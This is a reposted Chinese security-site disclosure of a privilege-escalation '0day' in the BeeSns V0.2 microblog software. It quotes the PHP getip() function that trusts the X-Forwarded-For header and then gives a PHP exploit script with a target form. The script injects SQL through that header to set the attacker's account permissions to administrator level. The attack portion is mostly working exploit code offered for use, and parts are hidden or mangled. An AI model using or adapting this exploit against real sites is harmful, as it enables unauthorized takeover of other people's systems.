【漏洞】BeeSns 微博 V0.2 0day

admin
admin
admin
102800
文章
87
评论
2021年4月3日18:50:22评论39 views字数 2899阅读9分39秒阅读模式

发布作者:子仪

影响版本:BeeSns V0.2

官方地址:http://www.beesns.com/

漏洞类型:权限提升

漏洞分析:

    IP过滤不严,导致用户可以提交恶意参数提升自身权限。这套微博系统风格挺不错的,个人比较喜欢,看代码是发现一些问题,直接看代码吧。

以下是引用片段:

// 获取客户端IP 
function getip() 
             { if (isset($_SERVER)) 
                    { if (isset($_SERVER[HTTP_X_FORWARDED_FOR])) 
                           { $realip = $_SERVER[HTTP_X_FORWARDED_FOR]; } 
                      elseif (isset($_SERVER[HTTP_CLIENT_IP])) 
                           { $realip = $_SERVER[HTTP_CLIENT_IP]; } 
                      else { $realip = $_SERVER[REMOTE_ADDR]; }
                     } 
                else { if (getenv("HTTP_X_FORWARDED_FOR")) 
                           { $realip = getenv( "HTTP_X_FORWARDED_FOR"); } 
                        elseif (getenv("HTTP_CLIENT_IP")) 
                           { $realip = getenv("HTTP_CLIENT_IP"); } 
                         else { $realip = getenv("REMOTE_ADDR"); }
               } 
$iphide=explode(".",$realip); 
$realip="$iphide[0].$iphide[1].$iphide[2].$iphide[3]";//!我不明白作者写的神马东西,IP没过滤,漏洞产生 
return $realip;

Exp:

print_r('' +---------------------------------------------------------------------------+

 BeeSns v0.2 Getip() Remote SQL Injection Exploit
 
site:www.beesns.com 

 by 子仪
 
Blog: http://www.sitedirsec.com 
 
+---------------------------------------------------------------------------+
''); 
if (empty($_POST[submit])) 
  {}
else
{ error_reporting(7); 
  ini_set(''max_execution_time'', 0); 
  $host = $_POST[host]; 
  $path = $_POST[path]; 
  $username = $_POST[username]; 
  $password = $_POST

输入密码查看隐藏内容


  send(); 

 
function send() 
           { global $host, $path,$username,$password; 
             $cmd = "uId=".$username."&uPw=".$password; 
             $getinj="1.1.1.1'',permissions=5 where uid=''$username''#"; 
             $data = "POST ".$path."post.php?act=userLogin HTTP/1.1rn"; 
             $data .= "Accept: */*rn"; 
             $data .= "Accept-Language: zh-cnrn"; $data .= "Content-Type: application/x-www-form-urlencodedrn"; 
             $data .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)rn"; 
             $data .= "Host: $hostrn"; $data .= "Content-Length: ".strlen($cmd)."rn";
             $data .= "Connection: Closern"; $data .= "X-Forwarded-For: $getinjrnrn"; 
             $data .= $cmd; $fp = fsockopen($host, 80); 
             fputs($fp, $data); $resp = '''';
             while ($fp && !feof($fp)) 
                $resp .= fread($fp, 1024); 
             if(preg_match(''#(.*)charset=utf-8(.*)1(.*)1(.*)0(.*)#Uis'',$resp))
                    { 
                     echo "
提升权限成功!"; 
                    }
             else
                    { echo "Failed!"; } 
           } 
?> 

目标地址:
*请勿加

http://http://%3cbr/">http://
>二级目录:
*如果不是二级目录,请保持默认
 用户名:
*您在目标站申请的用户名,

建议用小号测试

密码:

 


文章来源于lcx.cc:【漏洞】BeeSns 微博 V0.2 0day

相关推荐: 论比特币,莱特币等山寨货币对黑产的帮助

论比特币,莱特币等山寨货币对黑产的帮助 委员长 | 2014-03-07 10:55 1.高匿性 比特币莱特币的高匿名性可保护货币钱包持有者的身份信息不被泄露, 黑产从业者可利用电子货币代替支付宝,在线网银等传统黑产资金的交易,并一直保持自己的身份不被泄露! …

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日18:50:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞】BeeSns 微博 V0.2 0dayhttp://cn-sec.com/archives/318775.html

发表评论

匿名网友 填写信息